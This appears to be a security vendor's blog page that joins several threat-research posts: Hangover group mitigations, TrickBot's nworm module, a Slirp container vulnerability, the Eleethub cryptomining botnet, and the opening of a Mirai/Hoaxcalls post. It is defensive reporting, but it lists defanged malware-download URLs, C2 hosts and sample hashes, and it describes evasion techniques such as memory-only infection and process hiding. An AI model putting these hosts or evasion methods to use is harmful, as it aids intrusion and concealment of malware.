Threat Assessment: Hangover Threat Group

Posted on by Doel Santos

Executive Summary

Unit 42 researchers recently published on activity by the Hangover threat group (aka Neon, Viceroy Tiger, MONSOON) carrying out targeted cyberattacks deploying BackConfig malware attacks against government and military organizations in South Asia. As a result, we’ve created this threat assessment report for the Hangover Group’s activities. The techniques and campaigns can be visualized using the Unit 42 Playbook Viewer.

Hangover Group is a cyberespionage group that was first observed in December 2013 carrying on a cyberattack against a telecom corporation in Norway. Cybersecurity firm Norman reported that the cyberattacks were emerging from India and the group sought and carried on attacks against targets of national interest, such as Pakistan and China. However, there have been indicators of Hangover activity in the U.S. and Europe. Mainly focusing on government, military, and civilian organizations. The Hangover Group's initial vector of compromise is to carry out spear-phishing campaigns. The group uses local and topical news lures from the South Asia region to make their victims more prone to falling into their social engineering techniques, making them download and execute a weaponized Microsoft Office document. After the user executes the weaponized document, backdoor communication is established between BackConfig and the threat actors, allowing attackers to carry on espionage activity, potentially exfiltrating sensitive data from compromised systems.

Palo Alto Networks Threat Prevention platform with WildFire, DNS Security and Cortex XDR detects activity associated with this threat group. Customers can also review activity associated with this Threat Assessment using AutoFocus with the following tags: Hangover and BackConfig.

Impact Assessment

Several adversarial techniques were observed in this activity and the following measures are suggested within Palo Alto Networks’ products and services to ensure mitigation of threats related with the Hangover Group, as well as other groups using the same techniques:

Tactic Technique

(Mitre ATT&CK ID)

 Product / Service Course of Action
Initial Access Spearphishing Link (T1192) NGFW Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources Exists
Threat Prevention† Ensure that antivirus profiles are set to block on all decoders except 'imap' and 'pop3'
Ensure a secure antivirus profile is applied to all relevant security policies
Ensure that User Credential Submission uses the action of 'block' or 'continue' on the URL categories
DNS Security Enable DNS Security in Anti-Spyware profile
URL Filtering Ensure that PAN-DB URL Filtering is used
Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
Ensure that access to every URL is logged
Ensure all HTTP Header Logging options are enabled
Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet
WildFire Ensure that WildFire file size upload limits are maximized
Ensure forwarding of decrypted content to WildFire is enabled
Ensure all WildFire session information settings are enabled
Ensure alerts are enabled for malicious files detected by WildFire
Ensure 'WildFire Update Schedule' is set to download and install updates every minute
Execution Exploitation for Client Execution (T1203) Threat Prevention† Ensure a Vulnerability Protection Profile is set to block attacks against critical and high vulnerabilities, and set to default on medium, low, and informational vulnerabilities
Ensure a secure Vulnerability Protection Profile is applied to all security rules allowing traffic
Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
User Execution (T1204) NGFW Ensure that User-ID is only enabled for internal trusted interfaces
Ensure that 'Include/Exclude Networks' is used if User-ID is enabled
Ensure that the User-ID Agent has minimal permissions if User-ID is enabled
Ensure that the User-ID service account does not have interactive logon rights
Ensure remote access capabilities for the User-ID service account are forbidden.
Ensure that security policies restrict User-ID Agent traffic from crossing into untrusted zones
Threat Prevention† Ensure that antivirus profiles are set to block on all decoders except 'imap' and 'pop3'
Ensure a secure antivirus profile is applied to all relevant security policies
Ensure an anti-spyware profile is configured to block on all spyware severity levels, categories, and threats
Ensure DNS sinkholing is configured on all anti-spyware profiles in use
Ensure passive DNS monitoring is set to enabled on all anti-spyware profiles in use
Ensure a secure anti-spyware profile is applied to all security policies permitting traffic to the Internet
DNS Security Enable DNS Security in Anti-Spyware profile
URL Filtering Ensure that PAN-DB URL Filtering is used
Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
Ensure that access to every URL is logged
Ensure all HTTP Header Logging options are enabled
Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet
WildFire Ensure that WildFire file size upload limits are maximized
Ensure forwarding of decrypted content to WildFire is enabled
Ensure all WildFire session information settings are enabled
Ensure alerts are enabled for malicious files detected by WildFire
Ensure 'WildFire Update Schedule' is set to download and install updates every minute
Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
Scripting (T1064) WildFire Ensure that WildFire file size upload limits are maximized
Ensure forwarding of decrypted content to WildFire is enabled
Ensure all WildFire session information settings are enabled
Ensure alerts are enabled for malicious files detected by WildFire
Ensure 'WildFire Update Schedule' is set to download and install updates every minute
Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
Defense Evasion BITS Jobs (T1197) NGFW Ensure that User-ID is only enabled for internal trusted interfaces
Ensure that 'Include/Exclude Networks' is used if User-ID is enabled
Ensure that the User-ID Agent has minimal permissions if User-ID is enabled
Ensure that the User-ID service account does not have interactive logon rights
Ensure remote access capabilities for the User-ID service account are forbidden.
Ensure that security policies restrict User-ID Agent traffic from crossing into untrusted zones
Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources Exists
Cortex XDR Configure Host Firewall Profile
Code Signing (T1116) Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
Hidden Files and Directories (T1158) Cortex XDR Configure Behavioral Threat Protection under the Malware Security Profile
Deobfuscate/Decode Files or Information (T1140) WildFire Ensure that WildFire file size upload limits are maximized
Ensure forwarding of decrypted content to WildFire is enabled
Ensure all WildFire session information settings are enabled
Ensure alerts are enabled for malicious files detected by WildFire
Ensure 'WildFire Update Schedule' is set to download and install updates every minute
Obfuscated Files or Information (T1027) WildFire Ensure that WildFire file size upload limits are maximized
Ensure forwarding of decrypted content to WildFire is enabled
Ensure all WildFire session information settings are enabled
Ensure alerts are enabled for malicious files detected by WildFire
Ensure 'WildFire Update Schedule' is set to download and install updates every minute
Cortex XDR Enable Anti-Exploit and Anti-Malware Protection
Command and Control Commonly Used Port (T1043) NGFW Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources Exists
URL Filtering Ensure that PAN-DB URL Filtering is used
Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
Ensure that access to every URL is logged
Ensure all HTTP Header Logging options are enabled
Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet
Standard Cryptographic Protocol (T1032) NGFW Ensure 'SSL Forward Proxy Policy' for traffic destined to the Internet is configured
Ensure 'SSL Inbound Inspection' is required for all untrusted traffic destined for servers using SSL or TLS
Ensure that the Certificate used for Decryption is Trusted
Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources Exists
Threat Prevention† Ensure that antivirus profiles are set to block on all decoders except 'imap' and 'pop3'
Ensure a secure antivirus profile is applied to all relevant security policies
Ensure an anti-spyware profile is configured to block on all spyware severity levels, categories, and threats
Ensure DNS sinkholing is configured on all anti-spyware profiles in use
Ensure passive DNS monitoring is set to enabled on all anti-spyware profiles in use
Ensure a secure anti-spyware profile is applied to all security policies permitting traffic to the Internet
DNS Security Enable DNS Security in Anti-Spyware profile
URL Filtering Ensure that PAN-DB URL Filtering is used
Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
Ensure that access to every URL is logged
Ensure all HTTP Header Logging options are enabled
Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet
WildFire Ensure that WildFire file size upload limits are maximized
Ensure forwarding of decrypted content to WildFire is enabled
Ensure all WildFire session information settings are enabled
Ensure alerts are enabled for malicious files detected by WildFire
Ensure 'WildFire Update Schedule' is set to download and install updates every minute
Remote File Copy (T1105) NGFW Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources Exists
WildFire Ensure that WildFire file size upload limits are maximized
Ensure forwarding of decrypted content to WildFire is enabled
Ensure all WildFire session information settings are enabled
Ensure alerts are enabled for malicious files detected by WildFire
Ensure 'WildFire Update Schedule' is set to download and install updates every minute
Standard Application Layer Protocol (T1071) NGFW Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources Exists
Threat Prevention† Ensure that antivirus profiles are set to block on all decoders except 'imap' and 'pop3'
Ensure a secure antivirus profile is applied to all relevant security policies
Ensure an anti-spyware profile is configured to block on all spyware severity levels, categories, and threats
Ensure DNS sinkholing is configured on all anti-spyware profiles in use
Ensure passive DNS monitoring is set to enabled on all anti-spyware profiles in use
Ensure a secure anti-spyware profile is applied to all security policies permitting traffic to the Internet
DNS Security Enable DNS Security in Anti-Spyware profile
URL Filtering Ensure that PAN-DB URL Filtering is used
Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
Ensure that access to every URL is logged
Ensure all HTTP Header Logging options are enabled
Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet

Table 1. Courses of Action for Hangover Group
†These capabilities are part of the NGFW security subscriptions service

Conclusion

The Hangover Group is active and, according to Unit 42 visibility, is targeting government and military organizations in South Asia.

The group continues to make use of compromised, third-party infrastructure to support the delivery of their weaponized documents, using spear-phishing emails containing links to said sites.

The delivery documents continue to evolve and, over the years, have moved from plain text code and URLs to encoded. From storing encoded executables within the documents, to using ZIP files - including a package of files - to finally downloading executables from command and control servers.

The installation of the BackConfig malware by the delivery documents is performed using multiple stages and components, most likely to evade sandboxes or other automated analysis and detection systems. This includes the use of Virtualization-based Security (VBS), batch codes, scheduled tasks, and conditional trigger files.

Once fully installed, the BackConfig malware communicates with the threat actors using HTTPS making visibility and detection potentially more difficult, and blends in amongst other similar traffic.

Once an infected system is under an actor’s control, the objective varies on the plugins deployed and the type of system or organization compromised.

Additional Resources

The suggested courses of action in this report are based on the information currently available to Palo Alto Networks and the capabilities within Palo Alto Networks’ products and services.

 

Goodbye Mworm, Hello Nworm: TrickBot Updates Propagation Module

Posted on by Brad Duncan

Executive Summary

First discovered in 2016, TrickBot is an information stealer that provides backdoor access sometimes used by criminal groups to distribute other malware. TrickBot uses modules to perform different functions, and one key function is propagating from an infected Windows client to a vulnerable Domain Controller (DC). TrickBot currently uses three modules for propagation. As early as April 2020, TrickBot updated one of its propagation modules known as "mworm" to a new module called "nworm." Infections caused through nworm leave no artifacts on an infected DC, and they disappear after a reboot or shutdown.

Other key differences of the new nworm module include:

    • It retrieves an encrypted, or otherwise encoded binary, over network traffic that represents a TrickBot executable file (the old mworm module sent it as an executable file without any sort of encryption/encoding).
    • A TrickBot infection caused by the new mworm module is run from system RAM and does not appear to remain persistent on an infected host.
    • This is a much better method of evading detection on an infected DC.

TrickBot is a significant threat that has received high-profile coverage in recent years, and this is a notable evolution. This blog reviews TrickBot modules, and it covers characteristics of the new nworm module in greater detail.

TrickBot Modules

TrickBot is modular, meaning it uses various binaries to perform different functions during an infection. In most cases, the basis of a TrickBot infection is a malicious Windows executable (EXE) file saved to disk. This EXE is often called a "TrickBot loader" because it loads the TrickBot modules. TrickBot modules are dynamic link libraries (DLLs) or EXEs run from system memory. See Figure 1 for a visualization of TrickBot modules.

Figure 1. A visual representation of TrickBot and its modules.

On an infected Windows 10 host, TrickBot modules are only found in system memory. But on an infected Windows 7 host, we also see artifacts related to the modules stored on the disk. These artifacts are encrypted binaries. During a TrickBot infection, these encrypted binaries are decrypted and run from system memory as TrickBot modules. Figure 2 shows an example of artifacts for TrickBot modules from an infection on a Windows 7 client in January 2020.

Figure 2. Example of artifacts for TrickBot modules on an infected Windows 7 client.

As seen in Figure 2, the artifact names end with 64, meaning this host is running a 64-bit version of Windows 7. If the infection happens on a 32-bit Windows 7 host, these artifact names would end in 32 instead of 64.

Figure 2 also reveals three modules TrickBot uses to spread to a DC in an Active Directory (AD) environment. They are:

    • mwormDll64 (the "mworm" module)
    • mshareDll64 (the "mshare" module)
    • tabDll64 (the "tab" module)

Note: The tab module has a propagation function, but it also includes different capabilities not applicable to this blog.

Modules for Propagation

Starting in September 2019, TrickBot modules with propagation capabilities have been mworm, mshare, and tab. They generate distinct activity when propagating to a vulnerable DC.

For the mshare and tab modules:

    • An infected Windows client retrieves a new TrickBot EXE using an HTTP URL.
    • The infected Windows client sends this new TrickBot EXE over SMB traffic to the vulnerable DC.

For the mworm module:

    • The infected Windows client uses an SMB exploit targeting the vulnerable DC.
    • The vulnerable DC retrieves a new TrickBot EXE using an HTTP URL and infects itself with it.

Of note, the mworm module did not usually appear unless the TrickBot infection happened in an AD environment with a DC.

Figure 3 shows a flow chart of propagation traffic caused by these three TrickBot modules.

Figure 3. TrickBot propagation flow chart from September 2019 through March 2020.

Since February 2020, URLs generated by these modules to retrieve follow-up TrickBot EXE files used the following patterns:

    • URL generated by mshare module ends with /images/cursor.png
    • URL generated by mworm module ends with /images/redcar.png
    • URL generated by tab module ends with /images/imgpaper.png

These URLs use IP addresses instead of domains. Figure 4 shows an example of the traffic filtered in Wireshark from a pcap of a TrickBot infection in March 2020.

Trickbot nworm and tab module
Figure 4. HTTP GET requests caused by TrickBot’s mshare, mworm and tab modules.

Goodbye Mworm: Hello Nworm

In April 2020 while generating a TrickBot infection in a lab environment, TrickBot stopped using the mworm module. In its place, a new artifact named "nworm" appeared on an infected Windows 7 client. Figure 5 shows an example of this new nworm artifact.

New nworm module
Figure 5. New nworm module found from an infection on April 24, 2020.

HTTP traffic for follow-up TrickBot EXEs caused by nworm is noticeably different than traffic caused by mworm. The differences are:

    • mworm: URL for TrickBot EXE ends with /images/redcar.png
    • nworm: URL for TrickBot EXE ends with /ico/VidT6cErs
    • mworm: Follow-up TrickBot EXE is returned unencrypted in the HTTP traffic
    • nworm: Follow-up TrickBot EXE is returned as an encrypted or otherwise encoded binary in the HTTP traffic

By using Wireshark and examining TCP streams, we can easily spot the differences in HTTP traffic caused by the old mworm module and the new nworm module. Figure 6 shows traffic from the mworm module in March 2020, and Figure 7 shows traffic from the nworm module in April 2020.

nworm module in March
Figure 6. TCP stream showing HTTP traffic caused by the mworm module in March 2020.
nworm module April 2020
Figure 7. TCP stream showing HTTP traffic caused by the nworm module April 2020.

Figure 8 shows the current propagation flowchart, highlighting changes seen with the nworm module since April 2020.

Figure 8. TrickBot propagation flow chart since April 2020.

Like mworm, the new nworm module does not appear unless the TrickBot infection happens in an AD environment with a DC.

TrickBot Caused By Nworm: Not Persistent

When nworm infects a vulnerable DC, the malware is run from memory. No artifacts are found on the infected DC and TrickBot on the DC doesn’t survive a reboot.

In cases where mshare and tab infect a vulnerable DC with TrickBot, these infections remain persistent on the DC, but TrickBot caused by nworm is not persistent. This shouldn’t be an issue for the malware, because the DC is a server and servers rarely shut down or reboot like a Windows client.

Post-Infection Gtag from TrickBot Caused By Nworm

Every TrickBot binary has an identifier called a gtag. This is found in configuration data extracted from a TrickBot binary. Gtags can also be found in HTTP traffic during a TrickBot infection. They indicate the specific campaign or source of infection used for a TrickBot binary.

The gtag is a short alphabetic string followed by a number representing a one-up serialization. Examples follow:

    • mor-series gtag: TrickBot caused by an Emotet infection, for example: TrickBot gtag mor84 caused by Emotet on January 27th, 2020.
    • ono-series gtag: various TrickBot infections initiated through malicious Microsoft Office documents like Word documents or Excel spreadsheets, distributed through English-language emails.
    • red-series gtag: TrickBot distributed as a DLL file instead of an EXE, for example: TrickBot gtag red5 documented on March 17th, 2020.

Gtags for TrickBot binaries used by TrickBot modules are unique. They break out as:

    • tot-series gtag: TrickBot binaries used by mshare module
    • jim-series gtag: TrickBot binaries used by nworm (and the old mworm) module
    • lib-series gtag: TrickBot binaries used by tab module

Figure 9 and Figure 10 show gtags from traffic filtered in Wireshark from an infection on April 20th, 2020. In these images, the Windows client is at 10.4.20.101, and the DC is at 10.4.20.4.

Figure 9. The initial TrickBot infection, where HTTP traffic from an infected client at 10.4.20.101 shows gtag ono38.
Infection caused by the nworm module.
Figure 10. TrickBot spreads to the DC where we see gtag jim716 from an infection caused by the nworm module.

Conclusion

An infection caused by nworm is run from system memory, leaves no artifacts on an infected DC and disappears after a reboot or shutdown. Furthermore, the TrickBot binary used by nworm is encrypted or otherwise encoded when it is retrieved over the Internet. These characteristics are likely an attempt by TrickBot developers to avoid detection.

This is the latest in a series of changes in TrickBot as it evolves within our current threat landscape.

However, best security practices like running fully-patched and up-to-date versions of Microsoft Windows will hinder or prevent TrickBot infections. Palo Alto Networks customers are further protected from TrickBot by our threat prevention platform. AutoFocus users can track TrickBot activity by using the TrickBot tag.

Indicators of Compromise

Recent HTTP URLs for TrickBot binaries for propagation to vulnerable DC

(Read: First seen YYYY-MM-DD - module name - URL)

2020-04-20 - nworm - hxxp://107.172.221[.]106/ico/VidT6cErs

2020-04-20 - mshare - hxxp://107.172.221[.]106/images/cursor.png

2020-04-20 - tab - hxxp://107.172.221[.]106/images/imgpaper.png

2020-05-08 - nworm - hxxp://23.95.227[.]159/ico/VidT6cErs

2020-05-08 - mshare - hxxp://23.95.227[.]159/images/cursor.png

2020-05-08 - tab - hxxp://23.95.227[.]159/images/imgpaper.png

SHA256 hash for nwormDll64 artifact (encrypted binary) from an infected Windows 7 client on April 24th 2020:

900aa025bf770102428350e584e8110342a70159ef2f92a9bfd651c5d8e5f76b

SHA256 hash for nwormDll64 artifact (encrypted binary) from an infected Windows 7 client on May 8th 2020:

85d88129eab948d44bb9999774869449ab671b4d1df3c593731102592ce93a70

Rootless Containers: The Next Trend in Container Security

Posted on by Aviv Sasson

Executive Summary

As cloud computing evolves, containers continue to become more and more popular. New solutions and ideas to the way we implement containers are being introduced. One of these new ideas is rootless containers.

Rootless containers is a new concept of containers that don’t require root privileges in order to formulate. Many solutions have been proposed to overcome the technological challenges of creating a container with an unprivileged user, some of them are still under development and some are production-ready. While rootless containers present some advantages, mainly from a security perspective, they are still in their early stages.

In this post, Unit 42 researcher Aviv Sasson reviews the internals of rootless containers. Aviv also presents a vulnerability he found in one of the major rootless networking components called Slirp. Palo Alto Networks customers running Prisma Cloud are protected from this vulnerability with the host and container vulnerability scanner, which alerts on software components running with this vulnerability.

Background

As the name implies, rootless containers are the same as conventional containers but differentiate in the fact that they don’t need root privileges in order to be formed.

Nowadays, rootless containers are still in early adoption stages, but are already supported by the major players in the field.

There are several reasons why rootless containers have emerged.

    • Adding a new security layer. In case the container engine, runtime or orchestrator is compromised, the attacker won't gain root privileges on the host.
    • Allowing multiple unprivileged users to run containers on the same machine (e.g. HPC).
    • Allowing isolation inside nested containers.

This solution was made possible by a new development in the Linux kernel that allows unprivileged users to create new user namespaces. When a user creates and enters a new user namespace, he becomes root in the context of that namespace and gains most of the privileges required to spawn a functioning container.

I won’t dig into user namespace technicalities, but namespace root isn’t as privileged as real root in areas that affect the entire system (for example, a namespace root cannot load or delete kernel modules). This led to some challenges that were solved differently by each container engine.

Networking

In order to allow proper networking inside a container, usually, a Virtual Ethernet device (VETH) is created and in charge of the networking. This poses a problem for rootless containers, as only real root has the privileges to create such devices. A number of solutions were proposed to solve the problem -- the main ones being Slirp and LXC-user-nic.

Slirp

Slirp was originally designed to be an internet dial-up for unprivileged users. In time, it found a new purpose as a networking stack for virtual machines and emulators, including the well-known QEMU (aka Quick Emulator). After some modifications, it was adjusted to enable networking in rootless containers. It works by forking into the container’s user and network namespaces and creating a tap device that becomes the default route. It then passes the device’s file descriptor to the parent who runs in the default network namespace, which is now able to communicate both with the container and the internet.

Figure 1. Slirp networking flow

LXC-User-Nic

Another way to set up networking is by running a setuid binary that creates a VETH device. Although it does enable networking inside the container, it misses the point of rootless containers because it requires the container binary to run with root privileges.

Storage

One of the complex elements in implementing containers is storage management. By default, container engines use a special driver called Overlay2 (or Overlay) to create a layered filesystem that is efficient in both space and performance. This cannot be done with rootless containers, as most Linux distributions don’t allow mounting overlay filesystems in user namespaces (Ubuntu is an exception). This problem drove rootless containers to work with other drivers and filesystems.

The obvious solution was to use another driver, like the VFS storage driver. While it works, it is significantly less efficient. The better solution was to create a new storage driver to suit the needs of rootless containers. One such driver is the FUSE-OverlayFS. It’s a user-space implementation of Overlay, which is more efficient then VFS and can run inside user namespaces.

Cgroups

The Linux control group (cgroups) feature, another key element of implementing containers, allows processes and containers to be organized into hierarchical groups whose usage of various types of resources can then be limited and monitored. Since the kernel’s cgroups interface is provided through a pseudo-filesystem that usually resides in “/sys” (a root owned directory), a non-root user cannot access and utilize it.

To tackle this problem, two approaches were proposed:

Cgroups V2

A new kernel implementation of cgroups that supports delegating permissions to unprivileged users. The downside is that V2 doesn’t support all the controllers that were implemented for cgroups V1 (e.g. devices, net_cls, net_prio,etc.).

PAM module

Another solution to the problem, by LXC, is to install pam_cgfs.so, which is a Pluggable Authentication Module (PAM module) that will allow unprivileged users to authenticate and manage cgroups.

Adoption status

The following container engines support rootless containers with the following components:

Docker Podman LXC
Networking - Slirp

- Lxc-user-nic

- VPNkit

 

 Slirp Lxc-user-nic
Storage VFS FUSE-OverlayFS VFS
Cgroups No support Limited support for cgroups v2 PAM module

Table 1. Adoption status

As seen in the table above, the most prominent container engines are working to support the various aspects of rootless containers, spearheaded by Podman and LXC.

Security

From a security perspective, there is a big benefit in using rootless containers. The premise in the security world is that every software can be compromised - whether by vulnerabilities or by misconfigurations - and that includes container implementations. We should always run any software with as limited privileges as possible, so when a security bug is exploited the impact would be minimized.

While rootless containers should be considered more secure, they utilize new features and components that haven’t yet been widely tested and reviewed. These components may inadvertently become another attack vector. One example is the networking solution of rootless containers. LXE-user-nic, or Slirp, could be vulnerable to security issues that would affect both the container and host.

LXE-user-nic has had multiple vulnerabilities that allowed privilege escalation, such as CVE-2017-5985 and CVE-2018-6556. Another example is Slirp. In recent years, several vulnerabilities were disclosed, including a heap overflow that can lead to code execution on the host. In order to avoid a total takeover, Slirp’s maintainers have added to their software a sandbox functionality and seccomp support, but the truth is that container engines run Slirp without the seccomp support as it’s still experimental and therefore it may be possible to escape the sandbox.

Slirp - CVE-2020-1983

As part of my research, I conducted my own research on Slirp in order to detect and fix possible vulnerabilities. While fuzzing the software, I identified a use-after-free vulnerability that can crash Slirp. The vulnerability was assigned CVE-2020-1983.

The issue has to do with how Slirp manages IP fragmentation. The maximum size of an IP packet is 65,535 bytes and when fragmenting IP fragments, this is supposed to be the limit. The bug here was that Slirp doesn’t verify the size of the fragmented IP packet and when it tries to fragment a packet that is bigger than 65,535, it crashes.

When Slirp stops, the container loses its network stack and effectively becomes unusable.

Other vulnerabilities in libslirp could lead to code execution on the container and not just crashing. It could even lead to an eventual breakout from the container to the host and to other containers. In 2020, two of such vulnerabilities were found: CVE-2020-8608 and CVE-2020-7039.

I would like to thank the Slirp development team for acknowledging my security advisory and quickly issuing a fix patch. The affected Slirp versions are 4.0.0 to 4.2.0.

Prisma Cloud Protection

Palo Alto Networks customers running Prisma Cloud are protected from this through the Prisma Cloud Compute host and container vulnerability scanner which alerts on vulnerable software components with this vulnerability.

Figure 2. Prisma Cloud Compute host flag

Conclusion

Rootless containers present a new approach for containers that adds a major security layer. It could easily become the next trend in containers in the cloud. While there are still many limitations and some parts of their functionality are still experimental and are under development, I do think that with time and effort rootless containers could be fully functional and adopted by the community while taking the place of traditional containers.

 

Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self-Hiding

Posted on by Asher Davila

Executive Summary

Unit 42 researchers uncovered a new botnet campaign using Perl Shellbot, intended to mine Bitcoin, while avoiding detection using a specially crafted rootkit. 

The bot is propagated by sending a malicious shell script to a compromised device that then downloads other scripts. After the victim device executes the downloaded scripts, it starts waiting for commands from its Command and Control (C2) server. While the Perl programming language is popular in malware for its wide compatibility, this botnet can potentially affect not only Unix-based systems but also Windows 10 systems that use a Linux subsystem. 

This new campaign uses a shared library called libprocesshider.so to hide the mining processes on the infected device and a specially crafted rootkit to avoid detection. The malicious actors use the name “Los Zetas”, which is an allusion to a Mexican criminal organization regarded as one of the most dangerous drug cartels in the country. Despite that, it is unlikely that the attackers are actually part of this criminal organization. Additionally, this botnet has links to UnderNet, one of the largest IRC (Internet Relay Chat) networks where different topics are discussed including malware and cybercrime.

Moreover, the botnet was still under development when it was uncovered. As a result, it doesn’t have many recruiters. However, it was important to stop it before the attackers compromised more devices. We observed that the botnet performs Bitcoin mining on its victim devices on a growing scale using known mining tools such as xmrig and emech. These tools have been seen in recent coin mining campaigns, such as VictoryGate and Monero mining over $6000 for profit. We estimate the Eleethub botnet can also grow to make thousands of dollars if it expands in a period of one to two years.

Shell Script Dropper

A compromised device will download a malicious shell script containing commands to download pieces of the botnet and create directories to copy the downloaded files into. Next, the device executes the downloaded files (procps.h, ps, setup, m) to start communicating with an IRC server. Additionally, it downloads and implements a library called libprocesshider.so (Figure 1), which will be explained later.

Figure 1. Downloaded files

Hiding Processes with a Rootkit

This botnet takes the concealment of mining tasks to the next level. First, it reuses the well known open-source process-hiding library libprocesshider to hide the mining process with LD_PRELOAD (Figure 2). This technique has been used in several past coin mining campaigns, such as that perpetrated by the Rocke group Unit 42 found in 2019. 

Figure 2. x.sh

In addition, the attackers use a specially crafted rootkit to hide the mining operation from detection in the ps (process status) command. Specifically, the malware replaces the original ps tool with a crafted one. The crafted tool calls the real ps (Figure 3) but filters off the mining processes xmrig and emech and sensitive keywords in the ps results such as proc, netstats, and tops (Figure 4). These keywords are usually assumed to be indicators of existing coin miners. By removing these keywords, the mining exploit hides itself from antivirus monitoring and avoids being killed by other competing coin miners (Outlaw, for example), which usually scan the running processes to discover if any other miners are present.

Figure 3. Installing rootkit
Figure 4. Process hiding

Connecting to the Botnet

Once the infected device has downloaded all the files in the rootkit (Figure 5) and has started running the malicious scripts, it will connect to an IRC server by sending an assigned nickname that starts with dark followed by a random integer number between 0 and 8999 (Figure 6).

Figure 5. Installation of the rootkit
Figure 6. Assigning a nickname to the compromised device (zombie)

The initial PING is followed by the word LAG + the current epoch time (Figure 8).

Figure 7. Sending the first PING to the IRC server

Additionally, it contains scripts to communicate with the UnderNet IRC server as well (Figure 8).

Figure 8. Sending a PING command to the IRC Undernet server

Because the botnet was not yet ready by the time we discovered it, we were unable to receive any commands from the IRC server. However, we were able to connect manually to the IRC server and explore the channels available. We discovered that, fortunately, the Miners channel had just a few recruiters or zombies (Figures 10 and 11).

Figure 9. Channels found manually
Figure 10. Zombies in the botnet

Later, the compromised device could start receiving commands to send attacks such as UDP floods, TCP floods, port scans, and HTTP attacks (Figure 7).

Figure 11. Available attacks

Figure 11. Available attacks

Los Zetas from Eleethub

The domain associated with the C2 server is eleethub[.]com. We visited the website and found a message announcing that something was coming, which probably was the botnet they were preparing (Figure 12).

Figure 12. Visiting eleethub[.]com
In addition, the IRC server prints a banner (MOTD) with the name of that domain (Figure 13).

Figure 13. Message Of The Day - Eleet Hub

The phrase “Los Zetas” is mentioned multiple times in the malicious scripts that compose the botnet. The most notable ones are in the main rootkit directory, in the setup file (Figure 14), and in the information from the botnet operators undead[@]los[.]zetas[.]mx (Figure 15). “Los Zetas” is a reference to a Mexican criminal organization, regarded as one of the most dangerous drug cartels in the country. However, it is unlikely that the attackers are actually part of this criminal organization.

Figure 14. Reference to “Los Zetas” in setup file
Figure 15. User related to los[.]zetas[.]mx

Conclusion

The new Perl shell-based botnet uses libraries such as libprocesshider.so to hide mining activities. In addition, the attackers use a specially crafted rootkit to hide the mining operation from discovery.

The Perl programming language is popular in malware for its wide compatibility across many Unix-based systems, such as Linux servers, PCs, and even IoT devices. Perl is a scripting language and does not need to be compiled for every different CPU architecture or firmware version. Another advantage of using Perl scripts is the wide range of libraries that can easily be implemented. This type of botnet takes advantage of the computing power of compromised devices to do various tasks such as coin mining and launching DDoS attacks.

Palo Alto Networks customers are protected from the Perl shell botnet by the following platforms:

  1. Threat Prevention Signatures: 85843 that identifies IRC C2 communication.
  2. PAN-DB and DNS Security block the attackers’ C2 server URL and domain.
  3. WildFire identifies and blocks Perl shell botnets.
  4. Palo Alto Networks IoT Security detects attacks such as IRC botnets targeting IoT devices

Indicators of Compromise

Samples

7ed8fc4ad8014da327278b6afc26a2b4d4c8326a681be2d2b33fb2386eade3c6

dbef55cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187e8ef6

d9001aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0412e4

14c351d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bd36358

6d1fe6ab3cd04ca5d1ab790339ee2b6577553bc042af3b7587ece0c195267c9b

C2 servers

eleethub[.]com

irc.eleethub[.]com

ghost.eleethub[.]com

62.210.119[.]142

82.76.255[.]62

Public keys found in the server

 

 

Mirai and Hoaxcalls Botnets Target Legacy Symantec Web Gateways

Posted on by Ruchna Nigam

Executive Summary

As part of Unit 42’s efforts to proactively monitor threats circulating in the wild, I recently came across new Hoaxcalls and Mirai botnet campaigns targeting a post-authentication Remote Code Execution vulnerability in Symantec Secure Web Gateway 5.0.2.8, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019. There is no evidence to support any other firmware versions are vulnerable at this point in time and these findings have been shared with Symantec.  They confirmed the currently exploited vulnerability is no longer present in Symantec Web Gateway 5.2.8.  Symantec also wanted to emphasize the point that this vulnerability does not impact Secure Web Gateway solutions, including ProxySG and Web Security Services.

